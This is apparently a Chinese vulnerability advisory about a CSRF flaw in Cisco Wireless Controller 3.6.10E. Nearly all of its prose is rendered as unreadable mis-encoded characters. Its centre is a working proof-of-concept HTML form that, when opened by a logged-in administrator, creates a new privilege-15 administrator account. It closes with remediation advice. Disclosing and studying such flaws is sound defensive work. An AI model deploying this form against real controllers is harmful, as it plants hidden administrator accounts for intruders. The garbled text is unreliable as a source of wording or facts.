Cisco Wireless Controller 3.6.10E CSRFÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-07-26

Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºÔÝÎÞ£¬£¬£¬£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬£¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


ÊÜÓ°ÏìµÄ°æ±¾


ÊÊÓÃÓÚCisco Wireless Controller 3.6.10E¡£¡£¡£


Îó²î¸ÅÊö


Cisco Wireless Controller 3.6.10EÊÇCiscoÐû²¼µÄÒ»¿îÎÞÏß¿ØÖÆÆ÷£¬£¬£¬£¬£¬£¬¿ÉΪҪº¦Ê¹ÃüÌṩ¿É¿¿µÄÐÔÄÜ¡£¡£¡£


Cisco Wireless Controller 3.6.10EÈÝÒ×Êܵ½CSRF¹¥»÷£¬£¬£¬£¬£¬£¬¹¥»÷Õß½«È«ÐÄÉè¼ÆµÄÇëÇó·¢Ë͸ø¾ßÓÐÖÎÀíÔ±¼¶±ð»á¼ûȨÏÞµÄÓû§£¬£¬£¬£¬£¬£¬·­¿ªURLºó£¬£¬£¬£¬£¬£¬½«Í¨¹ýÖÎÀíÔ±µÄ»á»°Ìá½»±íµ¥£¬£¬£¬£¬£¬£¬²¢Àֳɽ«ÐÂÓû§Ìí¼ÓΪÖÎÀíÔ±¡£¡£¡£


Îó²îÑéÖ¤


<html>


<body>


<form action="http://IP/security/cfgSecurityAAAUsersCreate


<http://192.168.1.1/security/cfgSecurityAAAUsersCreate>" method="POST">


<input type="hidden" name="username" value="secretadmin" />


<input type="hidden" name="privilege" value="15" />


<input type="hidden" name="password" value="K3Y" />


<input type="hidden" name="description" value="CSRF" />


<input type="hidden" name="type" value="lobby-admin" />


<input type="hidden" name="cfnpassword" value="K3Y" />


<input type="hidden" name="yearlife" value="2013" />


<input type="hidden" name="hourlife" value="16" />


<input type="hidden" name="monthlife" value="7" />


<input type="hidden" name="minlife" value="17" />


<input type="hidden" name="datelife" value="16" />


<input type="hidden" name="seclife" value="0" />


<input type="submit" value="submit" />


</form>


</body>


</html>


ÐÞ¸´½¨Òé


1¡¢¹Ø×¢¹Ù·½ÍøÕ¾£¬£¬£¬£¬£¬£¬ÊµÊ±¾ÙÐиüУ»£»£»£»£»


2¡¢ÑéÖ¤HTTP Referer×ֶΣ»£»£»£»£»


3¡¢ÔÚÇëÇ󵨵ãÖÐÌí¼Ótoken²¢ÑéÖ¤£»£»£»£»£»


4¡¢ÔÚHTTPÍ·ÖÐ×Ô½ç˵ÊôÐÔ²¢ÑéÖ¤¡£¡£¡£


²Î¿¼Á´½Ó